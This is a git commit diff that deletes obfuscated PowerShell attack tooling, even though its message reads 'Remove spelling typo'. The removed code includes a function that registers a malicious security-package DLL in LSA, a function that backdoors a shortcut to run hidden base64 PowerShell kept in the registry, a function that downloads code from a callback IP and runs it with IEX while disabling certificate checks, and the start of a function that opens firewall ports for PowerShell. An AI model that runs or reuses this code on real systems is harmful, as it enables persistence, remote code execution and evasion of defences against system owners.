Remove spelling typo

mdns
cobbr 2017-03-11 20:08:52 -06:00
parent 34ee7ad1ed
commit 5308840474
5 changed files with 0 additions and 944 deletions


@ -1,114 +0,0 @@
SeT 8i53f ( [tYpe]("{0}{1}{2}{3}"-f'Appd','O','mA','In')) ; sET-itEM ('VAR'+'Iab'+'Le:4O'+'TI'+'R') ([tYpE]("{5}{3}{6}{1}{0}{7}{2}{4}"-F'sEmbl','It.as','UildEracC','E','Ess','R','flECTIoN.em','YB')) ; SEt-item VAriabLE:Tn86A ( [typE]("{0}{1}{3}{2}"-F 'fLA','gs','E','atTRiBUT') ) ; Set-itEm ("vARIABlE:w"+"2"+"i") ( [tYPe]("{3}{5}{6}{4}{2}{1}{0}" -f'NgsiZe','ki','PAC','reFL','it.','ECT','ioN.eM') ) ; $TDcp81= [TyPe]("{8}{4}{6}{1}{0}{7}{2}{3}{5}" -F'aLlI','n.C','nvEn','Ti','i','Ons','O','NgCo','ReFlEct'); SeT-ITeM vaRiAbLE:xGL ( [TyPE]("{1}{0}"-f 'nt32','i') ) ; $liW9 = [TyPE]("{11}{3}{2}{5}{1}{8}{6}{4}{9}{7}{10}{0}"-F 'IoN','.','Nti','U','l','Me','TeroPseRvICes.Ca','Ng','IN','li','cONvEnT','r'); sv x8o ( [TypE]("{4}{6}{7}{1}{5}{3}{2}{0}" -F 'ArsEt','Inte','.Ch','Es','RUnt','ropsERVIC','im','e.') ) ; $UmdQ8=[tYPE]("{1}{0}" -f 'tR','iNtp') ; $EHv6mU =[TYPe]("{4}{2}{8}{0}{7}{1}{5}{3}{6}" -F'S','Ces','me.Int','s','ruNTi','.maR','haL','erVi','ErOp') ; function Ge`T-s`ecURi`TyPac`KaG`es
{
[CmdletBinding()] Param()
${DYn`ASsEmb`ly} = New-Object ("{0}{1}{5}{3}{4}{2}"-f'S','yste','me','mblyN','a','m.Reflection.Asse')('SSPI')
${ASsem`B`Ly`BuilDeR} = ( GI VARIable:8i53f)."v`ALUe"::"CURrENt`Do`M`AIn"."dEF`I`Ne`d`Yna`MiC`AsSemBly"(${dy`NaSs`eMBLy}, $4oTir::"r`Un")
${M`OduLebu`IL`D`Er} = ${aSS`EmBlY`BU`iLd`er}."DEf`in`eDyNAMi`CmodU`le"('SSPI', ${fal`SE})
${fl`A`gs`c`oNSTRuCtOR} = $tN86A."gE`T`ConStR`uC`ToR"(@())
${f`LAG`sC`Us`To`Ma`TTRIBute} = New-Object ("{3}{4}{0}{10}{1}{9}{7}{8}{6}{5}{2}"-f'le','ion.Emi','r','Re','f','Builde','te','.C','ustomAttribu','t','ct')(${f`lA`gS`cO`NsTRU`CtoR}, @())
${STrucT`A`T`Tr`IBuT`es} = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
${e`NumB`UILDer} = ${MO`duleBU`IL`DER}."D`ef`inE`eNum"('SSPI.SECPKG_FLAG', 'Public', [Int32])
${E`NuMBUi`l`deR}."sETCU`sToM`AtTRibu`TE"(${Fl`AgS`CUStOmat`T`Ri`BUTe})
${n`ULL} = ${enumB`Ui`lD`er}."def`ine`LiTeRaL"('INTEGRITY', 1)
${N`uLL} = ${enUmb`uILD`Er}."D`ef`In`EL`itERal"('PRIVACY', 2)
${N`uLl} = ${enuM`Bu`iL`Der}."dEfIneLITE`R`AL"('TOKEN_ONLY', 4)
${N`uLL} = ${E`NuMbuI`ldER}."DEFiNEL`Iter`AL"('DATAGRAM', 8)
${n`ULL} = ${en`umbUi`l`dER}."def`IN`ElITErAl"('CONNECTION', 0x10)
${nU`lL} = ${EN`umBU`Il`Der}."d`EfinEL`iT`eRAl"('MULTI_REQUIRED', 0x20)
${nU`lL} = ${e`NUMbUiLD`ER}."DeF`IN`eliTeRAL"('CLIENT_ONLY', 0x40)
${NU`ll} = ${e`NUm`BUi`LdeR}."DEfin`el`i`TerAL"('EXTENDED_ERROR', 0x80)
${Nu`ll} = ${EnU`mBUil`D`ER}."dEfi`NELi`TeR`Al"('IMPERSONATION', 0x100)
${nu`ll} = ${e`NumbU`iLd`ER}."DefIN`e`liTERal"('ACCEPT_WIN32_NAME', 0x200)
${N`Ull} = ${ENu`MbUiLD`ER}."DeFINe`LIT`e`RAL"('STREAM', 0x400)
${nU`LL} = ${E`NUmBuil`DER}."d`E`F`InELITERaL"('NEGOTIABLE', 0x800)
${N`ULL} = ${EnUM`Bu`i`ldEr}."dE`FINE`LITeRaL"('GSS_COMPATIBLE', 0x1000)
${nU`Ll} = ${enuMb`uILD`eR}."DefiNElITE`R`Al"('LOGON', 0x2000)
${nU`ll} = ${EnU`Mb`u`ilder}."d`eFiNe`lIt`ErAl"('ASCII_BUFFERS', 0x4000)
${NU`Ll} = ${en`UMBuil`DER}."DE`FinE`Lit`erAl"('FRAGMENT', 0x8000)
${n`ULL} = ${E`NumB`uI`lder}."dEf`inElit`Eral"('MUTUAL_AUTH', 0x10000)
${NU`LL} = ${E`NuMbUIL`D`er}."dEfiNEL`I`TE`RaL"('DELEGATION', 0x20000)
${N`ulL} = ${en`uMbuI`LDER}."DefIn`El`iTeRAl"('READONLY_WITH_CHECKSUM', 0x40000)
${n`ULL} = ${EN`uM`BuIl`DeR}."deFI`NEl`Ite`RaL"('RESTRICTED_TOKENS', 0x80000)
${n`uLL} = ${enU`mbu`ILD`Er}."De`FInel`iteR`AL"('NEGO_EXTENDER', 0x100000)
${Nu`ll} = ${EN`Um`BuILD`Er}."D`eFIN`eL`ITeRAl"('NEGOTIABLE2', 0x200000)
${n`ULL} = ${eN`um`BUILdeR}."D`EfINe`lItERAl"('APPCONTAINER_PASSTHROUGH', 0x400000)
${n`ull} = ${ENuMBU`I`lDeR}."d`EfIn`eLi`Te`RAL"('APPCONTAINER_CHECKS', 0x800000)
${se`C`PKg_`FLag} = ${EnuM`B`UILdEr}."cReATET`y`pE"()
${tYp`eBuiL`Der} = ${M`o`d`UL`ebUILDEr}."DE`Fi`NETYpe"('SSPI.SecPkgInfo', ${sTRUC`Ta`TTrIBuT`es}, [Object], (get-VArIAbLE ('W2'+'i') -vAl )::"siZ`e8")
${N`ulL} = ${ty`Pebui`LDEr}."d`eF`IN`eFIelD"('fCapabilities', ${S`EC`PKg_FL`AG}, 'Public')
${NU`Ll} = ${t`y`peBu`ILder}."De`FiN`e`FieLD"('wVersion', [Int16], 'Public')
${Nu`lL} = ${T`yP`E`BUIldER}."De`FInEFI`Eld"('wRPCID', [Int16], 'Public')
${N`UlL} = ${typE`BuIL`dER}."D`eFI`NEFIElD"('cbMaxToken', [Int32], 'Public')
${n`Ull} = ${T`ypEBu`il`DER}."DE`FiN`EF`iELD"('Name', [IntPtr], 'Public')
${Nu`ll} = ${T`YpE`BUild`ER}."d`e`FInEfieLD"('Comment', [IntPtr], 'Public')
${S`e`CpKG`INFo} = ${tyPebUI`l`d`eR}."c`R`eaTETyPE"()
${tyPe`BUi`ldeR} = ${m`Odulebui`l`der}."D`efIne`TYPe"('SSPI.Secur32', 'Public, Class')
${piNvo`kE`me`T`hOD} = ${TYpE`B`uildER}."de`F`iNEp`i`NvokeMethod"('EnumerateSecurityPackages',
'secur32.dll',
'Public, Static',
( geT-iTeM ('vARiaBL'+'E:tD'+'cP8'+'1') )."v`AlUe"::"s`T`Andard",
[Int32],
[Type[]] @( ( get-VARiaBlE XgL )."V`AlUE"."maKE`BYrEfT`YPE"(),
( VARiabLE ("U"+"mDQ8") )."va`LuE"."MAKe`BYR`E`FTypE"()),
(Item ('v'+'A'+'RiaBL'+'E:lIW9'))."vAl`UE"::"wI`NAPI",
(VaRIaBLE X8o -VaL )::"A`NsI")
${s`e`CUR32} = ${typ`Ebu`iLdEr}."crEA`T`e`TYpe"()
${PAC`kAGEc`ount} = 0
${PAcK`AgeARraY`P`Tr} = ( GET-varIablE ("UMdQ"+"8") )."v`Alue"::"zE`Ro"
${r`e`sUlT} = ${sEC`uR`32}::"EnU`m`E`RATeS`e`cU`RitY`pACKAGEs"([Ref] ${p`AckagE`couNt}, [Ref] ${p`ACkAGE`AR`RAypTr})
if (${R`E`Sult} -ne 0)
{
throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))"
}
if (${pA`CkA`ge`cOUnt} -eq 0)
{
Write-Verbose 'There are no installed security packages.'
return
}
${s`T`RucTaDdRe`SS} = ${paCK`A`GeaRr`AyPtr}
foreach (${I} in 1..${PaC`kAgec`O`u`Nt})
{
${SeCpaC`kagES`T`R`u`Ct} = ( gi ('VARIa'+'bLe:EhV6'+'M'+'u'))."V`AluE"::"PTrt`osTr`uctu`Re"(${s`TRU`cT`ADd`REsS}, [Type] ${SECP`KG`infO})
${STR`ucT`ADDRE`Ss} = [IntPtr] (${sTRUc`TaddrE`Ss}."TO`INt64"() + $ehV6Mu::"SiZE`OF"([Type] ${se`C`Pkg`INFo}))
${na`ME} = ${NU`LL}
if (${seCP`Ac`KaGeS`TrU`ct}."n`AME" -ne (dIR ('varI'+'A'+'ble'+':'+'uMdq8'))."VAl`uE"::"ze`Ro")
{
${n`Ame} = (geT-cHiLdiTEM ("vaRIabl"+"e:e"+"H"+"V6mu"))."V`AluE"::"p`TRt`ostRiNg`A`NSI"(${s`eCpack`AGeSTR`UCt}."na`Me")
}
${C`Omm`eNt} = ${N`UlL}
if (${S`Ec`P`ACkA`GeStru`ct}."COmm`ent" -ne ( gi ("vaRI"+"ab"+"Le"+":UMd"+"Q8") )."VAL`UE"::"Z`ERO")
{
${C`oMMeNt} = (varIAbLE Ehv6mu )."va`LUE"::"PTR`T`oSTr`InGan`SI"(${SE`C`pacK`AGE`St`RUcT}."cOMmE`NT")
}
${AT`TrIbUt`Es} = @{
"nA`me" = ${Na`ME}
"Co`MmeNT" = ${c`omme`Nt}
"Cap`Abil`iTI`es" = ${s`E`CP`AcKAG`ES`TrucT}."FCaP`Ab`Il`IT`iES"
"MA`Xto`KenSiZe" = ${seCp`Ac`K`A`GestRUCT}."C`BM`AxToKen"
}
${SE`cP`AcKA`GE} = New-Object ("{2}{1}{0}"-f 't','c','PSObje') -Property ${A`TT`R`iBUteS}
${sECpacK`A`Ge}."PS`o`Bject"."Typ`e`NamEs"[0] = 'SECUR32.SECPKGINFO'
${Sec`pACka`ge}
}
}


@ -1,171 +0,0 @@
${Y`cDt} = [tYpe]("{4}{3}{6}{7}{5}{1}{0}{2}" -f'en','pal.windowSId','Tity','ecuR','S','CI','I','TY.pRin') ; Set-vaRIAbLE ("{1}{0}" -f'rj','f') ( [tYpe]("{0}{2}{6}{1}{7}{4}{3}{8}{5}"-f 'S','Y.PrInCI','eCuRi','bUIL','Ows','LE','T','pal.WINd','tINro') ) ; ${X`kW} = [tYPe]("{2}{1}{3}{0}" -F'IlemOdE','StEM','Sy','.io.f') ; sV ('x1'+'uO') ( [TYPE]("{0}{4}{2}{6}{1}{3}{5}" -F'SyStEM','c','.fiLe','C','.iO','Ess','A')) ; Set-IteM ("varIaBLe:u"+"W"+"b") ( [TYpe]("{1}{0}{4}{3}{2}"-f'.','sySTEm','Ng','OdI','TeXt.asCiienc') ) ;${60Oc} = [TYpE]("{6}{2}{1}{3}{4}{0}{5}"-f'koRig','M.io.S','te','e','E','iN','SYs'); sV ('yAp'+'vd') ( [TyPE]("{2}{1}{0}"-F'MaIN','dO','App') ) ; ${8d`B6O5}=[TYpE]("{1}{3}{6}{2}{0}{4}{5}" -f 'emBlybu','Ref','.ASS','LE','IlD','ERACCESS','CTIon.emit'); Set-ITEm ("vAr"+"Iable:"+"T"+"8Cg") ([TyPe]("{3}{5}{7}{0}{6}{4}{8}{2}{1}"-f 'o','onS','TI','Ref','al','lECT','n.c','I','lINgcoNVEn') ) ; SET-vAriAbLe ("{0}{1}" -f '0','zs') ( [type]("{2}{7}{0}{6}{5}{1}{3}{4}"-f'Me.','eRvIce','rUn','S.CaLlI','NgcONVEnTIoN','Terops','IN','TI') ); SEt ("{0}{1}" -f 'N','5m') ( [tYPE]("{0}{5}{4}{6}{8}{2}{7}{3}{1}"-F'ru','harSEt','PserV','.C','tIM','N','E.','IcES','iNTERo') ) ;${c`7fb`dZ} = [TyPE]("{0}{2}{1}"-F 'I','TPtr','n');${6`O0hvP}= [TYPE]("{3}{0}{2}{5}{1}{7}{4}{6}" -f'u','in','NtIme','R','icES.MaRshA','.','l','teropSerV') ;function INStAl`l-`S`sP
{
[CmdletBinding()] Param (
[ValidateScript({Test-Path (Resolve-Path ${_})})]
[String]
${p`Ath}
)
${PrI`N`ciPaL} = [Security.Principal.WindowsPrincipal] ${yc`dt}::"G`EtCuRRe`Nt"()
if(-not ${P`RI`NC`IPal}."I`SinRolE"( (GI ("{3}{0}{2}{1}" -f 'ARi','Le:frj','ab','V')).VAlUe::"Adm`I`NisTR`At`OR"))
{
throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.'
}
${FUlLDLl`p`A`Th} = Resolve-Path ${Pa`TH}
function LOCAl:g`Et-peaRcHItE`C`TU`Re
{
Param
(
[Parameter( pOsITion = 0,
MandATory = ${TR`Ue} )]
[String]
${pA`Th}
)
${Fil`e`S`TreaM} = New-Object ("{3}{0}{1}{2}{4}" -f 's','tem.I','O.FileS','Sy','tream')(${Pa`Th}, ${X`KW}::"Op`eN", (gi ('Va'+'r'+'iaB'+'lE'+':x1uO')).vALUe::"rE`Ad")
[Byte[]] ${m`zHe`A`der} = New-Object ("{0}{1}" -f 'Byte','[]')(2)
${F`IL`eS`TrEAM}."RE`AD"(${m`Zhe`ADER},0,2) | Out-Null
${h`EA`dER} = ( childITEM ("VarIabLE:u"+"w"+"B") ).VaLue::"aS`CII"."gEt`StRi`Ng"(${M`ZHEad`ER})
if (${hE`AdEr} -ne 'MZ')
{
${F`IlE`sTRe`AM}."cLo`se"()
Throw 'Invalid PE header.'
}
${Fi`lEST`REAM}."S`eeK"(0x3c, ( geT-ChilDItem ("{1}{0}{3}{4}{2}" -f 'Le','VARIAB','C',':','60O')).Value::"BE`GIn") | Out-Null
[Byte[]] ${L`FaN`EW} = New-Object ("{1}{0}"-f ']','Byte[')(4)
${F`IlEs`TreAm}."RE`AD"(${Lf`AnEw},0,4) | Out-Null
${PEoF`FS`et} = [Int] ('0x{0}' -f (( ${l`F`AnEW}[-1..-4] | % { ${_}."tOst`R`ING"('X2') } ) -join ''))
${FIl`eStrE`AM}."se`ek"(${pE`o`FFSEt} + 4, ( Ls ("v"+"aRIAb"+"L"+"e:60OC") ).ValUe::"b`eGin") | Out-Null
[Byte[]] ${i`mAGE_`File_`m`ACh`iNe} = New-Object ("{2}{0}{1}" -f'e[',']','Byt')(2)
${FI`Les`TRE`Am}."rE`AD"(${ImAGe_`File`_`M`Ach`Ine},0,2) | Out-Null
${aRch`ITeC`T`URE} = '{0}' -f (( ${ImaGe_`FiL`E`_mACHiNe}[-1..-2] | % { ${_}."Tost`RInG"('X2') } ) -join '')
${FI`LESt`Ream}."Cl`ose"()
if ((${A`RcHi`TeCtu`RE} -ne '014C') -and (${aRC`hiteCT`uRe} -ne '8664'))
{
Throw 'Invalid PE header or unsupported architecture.'
}
if (${ARcHi`TECTu`Re} -eq '014C')
{
Write-Output '32-bit'
}
elseif (${archIT`ec`TUre} -eq '8664')
{
Write-Output '64-bit'
}
else
{
Write-Output 'Other'
}
}
${DL`larchiT`Ec`TUre} = Get-PEArchitecture ${fu`L`ld`LlPath}
${OS`ARcH} = Get-WmiObject ("{1}{6}{3}{2}{0}{5}{4}" -f 'erating','Wi','Op','2_','tem','Sys','n3') | Select-Object -ExpandProperty ("{0}{2}{1}"-f'O','ture','SArchitec')
if (${d`ll`ArcH`itE`CTURE} -ne ${O`SArcH})
{
throw 'The operating system architecture must match the architecture of the SSP dll.'
}
${D`Ll} = Get-Item ${FULl`D`LlP`ATH} | Select-Object -ExpandProperty ("{1}{0}" -f 'e','Nam')
${dLl`N`Ame} = ${D`ll} | % { % {(${_} -split '\.')[0]} }
${sec`urI`Typa`ck`AgES} = Get-ItemProperty (("{8}{2}{10}{6}{5}{4}{12}{11}{1}{7}{0}{3}{9}" -f 'olSet','n','M:rAUSYST','rAUCon','r','UCu','MrA','tr','HKL','trolrAULsa','E','ntCo','re')).REPLacE('rAU','\') -Name 'Security Packages' |
Select-Object -ExpandProperty 'Security Packages'
if (${SeCUR`ITy`p`AcK`A`gEs} -contains ${dLlN`A`me})
{
throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages."
}
${N`ATive`I`NStA`L`lDir} = "$($Env:windir)\Sysnative"
if (Test-Path ${NatIVe`iNsta`l`LdIR})
{
${iNst`AL`lD`Ir} = ${nativ`eI`Ns`TalLDIR}
}
else
{
${iNSta`l`l`dIR} = "$($Env:windir)\System32"
}
if (Test-Path (Join-Path ${iNstA`L`LD`IR} ${d`ll}))
{
throw "$Dll is already installed in $InstallDir."
}
Copy-Item ${ful`L`dlLp`AtH} ${INStAll`D`Ir}
${S`ecuRit`ypAcKA`gES} += ${dl`L`Name}
Set-ItemProperty ((("{1}{8}{0}{4}{2}{9}{5}{6}{7}{10}{3}" -f 'Y','HKLM:','QD1CurrentContro','1Lsa','STEM','etQ','D1Contro','lQ','QD1S','lS','D')) -cRePLace 'QD1',[cHAR]92) -Name 'Security Packages' -Value ${SEC`U`RityP`ACkages}
${DYnaS`S`eMblY} = New-Object ("{0}{1}{7}{4}{2}{5}{6}{3}" -f 'S','yste','e','Name','R','flecti','on.Assembly','m.')('SSPI2')
${assE`M`BLyBUil`Der} = ${yAP`Vd}::"CU`Rre`NtDoma`IN"."de`FI`NED`y`NAmIcaS`semb`LY"(${dyna`S`Sem`BLY}, ( DiR ("{0}{1}{3}{2}{4}" -f'vaR','iAb','8d','le:','B6o5') ).vALUe::"r`uN")
${M`odULebUi`lder} = ${Assem`B`LYbu`I`LDEr}."deF`inEDyna`mI`cmOD`u`LE"('SSPI2', ${faL`sE})
${Ty`PebuILD`er} = ${MODUL`eBU`Il`DER}."De`F`inE`TYpe"('SSPI2.Secur32', 'Public, Class')
${PIn`V`OKE`m`eTHOD} = ${TY`pEbuiL`deR}."De`FinePINvo`kEm`E`THoD"('AddSecurityPackage',
'secur32.dll',
'Public, Static',
${T8`Cg}::"stA`ND`ARD",
[Int32],
[Type[]] @([String], [IntPtr]),
( gET-VarIABle ("{1}{0}" -f 'ZS','0') -ValUeonl )::"WInA`PI",
${n`5M}::"AU`TO")
${S`Ecu`R32} = ${TYp`e`BUI`lDEr}."C`REaTET`YpE"()
if ( ( vaRiAble ('c'+'7FbDZ') ).VAlUe::"S`Ize" -eq 4) {
${S`Tructs`i`ZE} = 20
} else {
${S`TrucTs`ize} = 24
}
${S`T`RUctpTr} = ( gI ("{1}{4}{3}{0}{2}"-f '0','v','hVp','BlE:6O','ARIa') ).VALUE::"AL`lo`cHgLObal"(${str`Uct`SIzE})
( chILDITeM ("{2}{1}{0}{3}"-f'O0H','riaBLE:6','VA','VP') ).Value::"wrIT`e`iNt32"(${st`R`u`CTptr}, ${sTru`C`TSI`Ze})
${runTI`M`eSUC`Ce`SS} = ${t`Rue}
try {
${rE`SU`lt} = ${s`Ec`ur32}::"AddS`E`c`U`RitypAck`Age"(${dLl`N`AME}, ${STRuC`T`pTR})
} catch {
${hR`e`sult} = ${er`ROR}[0]."Excep`Ti`ON"."I`NnE`R`eXCePT`ioN"."HrESU`LT"
Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))"
Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)"
${RUN`TiMES`Uc`cE`SS} = ${f`AlsE}
}
if (${Ru`NT`iMESU`cCEsS}) {
Write-Verbose 'Installation and loading complete!'
} else {
Write-Verbose 'Installation complete! Reboot for changes to take effect.'
}
}


@ -1,76 +0,0 @@
${0`4Dp}= [tYpe]("{0}{2}{4}{3}{1}" -F'sys','ding','teM.TE','ENCo','xt.') ; ${x`8Yn9} = [typE]("{0}{4}{3}{2}{1}"-F 'Sy','t','NVer','Tem.Co','S'); function iN`VOKe-BaCkdoO`Rl`NK {
[CmdletBinding()] Param(
[Parameter(vaLueFrOMPIPeLINe=${T`Rue}, MAnDAtory = ${t`RuE})]
[ValidateScript({Test-Path -Path ${_} })]
[String]
${l`NkpATh},
[String]
${ENcs`cr`IpT},
[String]
${rEG`pA`TH} = 'HKCU:\Software\Microsoft\Windows\debug',
[Switch]
${C`LEANUp}
)
${ReG`pa`Rts} = ${REG`pA`TH}."sp`LIT"("\")
${PA`Th} = ${r`e`GpaRtS}[0..(${r`EGp`Ar`TS}."c`OUnt"-2)] -join "\"
${N`AmE} = ${RE`Gp`ArTS}[-1]
${o`Bj} = New-Object -ComObject ("{0}{2}{1}"-f'WScri','ll','pt.She')
${l`Nk} = ${o`Bj}."crE`At`esHo`Rtcut"(${LNK`pa`Th})
${Targ`e`T`patH} = ${L`NK}."tA`RgE`TpA`Th"
${W`Ork`iN`g`DIRECTory} = ${l`NK}."WOrkING`DIr`Ec`T`oRy"
${icOn`LOCat`Ion} = ${L`NK}."Ic`oN`LO`cATION"
if(${CL`eAnUp}) {
${ORIg`I`NAl`p`ATh} = (${ic`onl`o`caTiOn} -split ",")[0]
${l`NK}."tArg`eTPA`Th" = ${ORiGI`NALP`ATh}
${L`Nk}."ArgU`m`ents" = ${Nu`LL}
${l`NK}."w`ind`o`wstylE" = 1
${L`Nk}."s`AvE"()
${N`uLL} = Remove-ItemProperty -Force -Path ${Pa`Th} -Name ${N`AmE}
}
else {
if(!${enC`scr`ipt} -or ${e`N`cSC`RIpT} -eq '') {
throw "-EncScript or -Cleanup required!"
}
${Nu`Ll} = Set-ItemProperty -Force -Path ${p`ATH} -Name ${N`AMe} -Value ${en`CSCRI`PT}
"[*] B64 script stored at '$RegPath'`n"
${L`Nk}."Ta`RGEtpa`TH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"
${L`A`uNch`StR`iNG} = '[System.Diagnostics.Process]::Start("'+${T`ArGetp`AtH}+'");IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp '+${P`AtH}+' '+${nA`Me}+').'+${na`ME}+')))'
${LAU`N`c`HBYteS} = ( cHiLdITem ("{4}{3}{2}{0}{1}"-f'4','dP',':0','iaBLE','VaR') )."v`Alue"::"UN`icode"."gETB`Y`TEs"(${LAun`cH`STRI`Ng})
${laUnC`H`B64} = ( dIr ("v"+"ar"+"iABLE:x8y"+"N9") )."v`ALuE"::"T`OBAse`64STri`Ng"(${LaU`Nchby`T`es})
${L`Nk}."a`Rg`UMEnts" = "-w hidden -nop -enc $LaunchB64"
${L`Nk}."WorK`INGdIR`e`C`ToRY" = ${W`oR`KInGdIrEc`TORy}
${l`Nk}."I`c`OnLocA`TION" = "$TargetPath,0"
${l`Nk}."wIN`dow`STy`le" = 7
${L`NK}."SA`VE"()
"[*] .LNK at $LNKPath set to trigger`n"
}
}


@ -1,583 +0,0 @@
$5kzyIT = [TYpE]("{4}{0}{1}{2}{3}" -F'e','t.SErV','I','CEPoinTmanAGeR','sySTem.n') ; $nzV2aP =[tyPe]("{1}{3}{2}{4}{0}"-F 'Rt','SYs','n','tEm.Co','vE') ; seT ('T'+'1o5') ( [Type]("{0}{3}{1}{2}" -f'sysTEM.T','nC','oding','exT.e') ) ;SeT-ITEM ("{3}{2}{0}{1}{4}" -f':Tr','i','bLe','varIa','XE') ( [tYPe]("{0}{3}{2}{1}"-F'sysTEm','s','.Dn','.neT') ) ; seT ("ZN"+"u") ( [type]("{2}{1}{3}{4}{5}{0}{6}" -F 't','ecURitY.PRiNC','s','ipAL.wInDoWs','ID','en','itY')) ; SET-itEm ("VArIABle"+":q8WgP"+"c") ( [TypE]("{0}{1}"-f'rE','gEX')) ; Sv ("{1}{0}" -f 'iUY','l8f') ([typE]("{3}{2}{4}{1}{0}" -f 'EtS.aDDReSsFaMIlY','K','t','NE','.SOc'));sEt-iteM ("{0}{3}{2}{1}"-f 'vaRiAb','pVj','4','lE:26') ( [typE]("{0}{5}{2}{4}{3}{1}"-F'nET.S','kettYpE','cKeTS.','Oc','s','o') ) ; SEt-IteM ("{2}{0}{3}{1}"-f 'blE','ACs','VArIa',':E') ([TYPE]("{2}{4}{3}{6}{1}{5}{0}{7}" -F'lT','o','neT.sO','KeT','c','TOcO','S.Pr','yPE') ); set-iTEM ("{3}{2}{0}{1}" -f 'bLE:','jMHB','aRiA','v') ([TYpE]("{1}{6}{2}{3}{5}{4}{0}" -F'e','NET','SOCkeTS','.IOCOnt','D','rOLCO','.')) ; sET-ITem ("vA"+"rIabLE:y"+"4"+"h"+"br") ( [tYpe]("{0}{1}{3}{4}{2}"-f 'NeT.SO','CKeTs.socKETFL','S','A','G')); Sv ("I6S"+"5nr") ( [tYpE]("{0}{1}{2}"-f'daT','ET','Ime'));
function iNv`okE-Ca`LlbAck`IEx
{
Param(
[Parameter(mANDatOry=${Tr`uE},poSitION=1)]
[string]${cAl`l`BAcKip},
[Parameter(mandatoRy=${Fa`LSE},poSitIoN=2)]
[int]${me`T`hOD}=0,
[Parameter(MAndaToRy=${F`AlSE},posITION=3)]
[string]${bI`TSt`eMPFi`Le}="$env:temp\ps_conf.cfg",
[Parameter(mANDAtOrY=${F`ALse},POsiTIoN=4)]
[string]${R`E`SouRCe}="/favicon.ico",
[Parameter(MaNDaTory=${FA`lsE},POsITIon=5)]
[bool]${sI`lENT}=${f`A`lSE}
)
if(${c`All`Ba`ckIP})
{
try {
if (${Met`H`OD} -eq 0)
{
${u`RL}="http://$CallbackIP$resource"
if(-not ${SiL`enT}) {write-host "Calling home with method $method to: $url"}
${e`NC} = (new-object ("{2}{0}{1}"-f 't','.webclient','ne'))."dOwn`loA`D`String"(${U`Rl})
}
elseif (${meT`h`od} -eq 1)
{
$5KZYIt::"S`eRv`e`RC`e`RTiFIcatEVali`DATiON`cAlLB`A`ck" = {${tr`ue}}
${u`RL}="https://$CallbackIP$resource"
if(-not ${s`IlenT}) {write-host "Calling home with method $method to: $url"}
${E`Nc} = (new-object ("{0}{2}{1}"-f'net.','client','web'))."DO`WnlOaD`St`Ring"(${u`RL})
}
elseif (${me`TH`oD} -eq 2)
{
${u`RL}="http://$CallbackIP$resource"
if(-not ${s`iL`EnT}) { write-host "Calling home with method $method to: $url"
write-host "BITS Temp output to: $BitsTempFile"}
Import-Module ("{0}{1}" -f '*','bits*')
Start-BitsTransfer ${u`RL} ${biTS`T`EM`p`FIle} -ErrorAction ("{1}{0}" -f'op','St')
${e`NC} = Get-Content ${biT`StEMp`FILe} -ErrorAction ("{1}{0}"-f'p','Sto')
Remove-Item ${B`It`St`eMpF`iLe} -ErrorAction ("{1}{3}{2}{0}"-f 'tinue','Si','entlyCon','l')
}
else
{
if(-not ${s`I`leNt}) { write-host "Error: Improper callback method" -fore ("{1}{0}"-f 'ed','r')}
return 0
}
if (${e`Nc})
{
${B} = (Gi ("{0}{1}{3}{2}"-f'VarIA','BLe:nz','p','v2A') ).vALuE::"f`RombAS`E64`stR`ING"(${E`NC})
${D`Ec} = ( gI ("VArIA"+"ble"+":T1o5")).VaLuE::"U`Tf8"."gETStr`i`NG"(${b})
iex ${D`EC}
}
else
{
if(-not ${s`ILE`Nt}) { write-host "Error: No Data Downloaded" -fore ("{0}{1}"-f'r','ed')}
return 0
}
}
catch [System.Net.WebException]{
if(-not ${sIl`Ent}) { write-host "Error: Network Callback failed" -fore ("{0}{1}" -f'r','ed')}
return 0
}
catch [System.FormatException]{
if(-not ${s`IlE`NT}) { write-host "Error: Base64 Format Problem" -fore ("{1}{0}" -f 'ed','r')}
return 0
}
catch [System.Exception]{
if(-not ${S`ILEnt}) { write-host "Error: Uknown problem during transfer" -fore ("{0}{1}" -f 'r','ed')}
return 0
}
}
else
{
if(-not ${sile`NT}) { write-host "No host specified for the phone home :(" -fore ("{1}{0}"-f'ed','r')}
return 0
}
return 1
}
function Ad`D-PS`FIrE`wA`LLru`Les
{
Param(
[Parameter(MaNDaToRY=${FA`LsE},pOsITion=1)]
[string]${ruL`en`Ame}="Windows Powershell",
[Parameter(maNDAtorY=${F`A`lSe},PoSItioN=2)]
[string]${e`xE`PATH}="C:\windows\system32\windowspowershell\v1.0\powershell.exe",
[Parameter(maNdatOry=${fAL`SE},poSitIon=3)]
[string]${P`oRtS}="1-65000"
)
If (-NOT ([Security.Principal.WindowsPrincipal] (GeT-vArIAblE ("zN"+"U") -ValueO )::"GEtCu`RR`eNt"())."IS`inR`OLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This command requires Admin :(... get to work! "
Return
}
${fw} = New-Object -ComObject ("{2}{1}{3}{0}"-f'2','cfg.fwp','hnet','olicy')
${R`ULE} = New-Object -ComObject ("{2}{1}{3}{0}" -f 'e','NetCf','H','g.FWRul')
${R`ulE}."n`AME" = ${Rul`E`Na`ME}
${R`ULE}."apP`LICAt`I`Onna`Me"=${e`XEPA`TH}
${RU`Le}."p`RO`TOcOL" = 6
${rU`LE}."loC`A`LPOrTS" = ${p`oRtS}
${ru`LE}."dI`ReCTIOn" = 2
${Ru`Le}."E`NA`BlED"=${t`RuE}
${R`Ule}."g`Ro`upinG"="@firewallapi.dll,-23255"
${ru`LE}."pro`FiL`ES" = 7
${R`uLe}."A`cTiON"=1
${r`uLe}."EDGetRA`V`E`RSAl"=${f`AlSE}
${fw}."r`ulES"."a`Dd"(${ru`lE})
${r`ULe} = New-Object -ComObject ("{3}{0}{2}{1}"-f '.FWR','le','u','HNetCfg')
${rU`Le}."Na`Me" = ${RulE`NAME}
${Ru`Le}."APPLICa`Tio`NN`A`me"=${E`x`EpAth}
${rU`LE}."p`RoTOcoL" = 17
${r`ule}."LoCAL`po`RTS" = ${P`orTs}
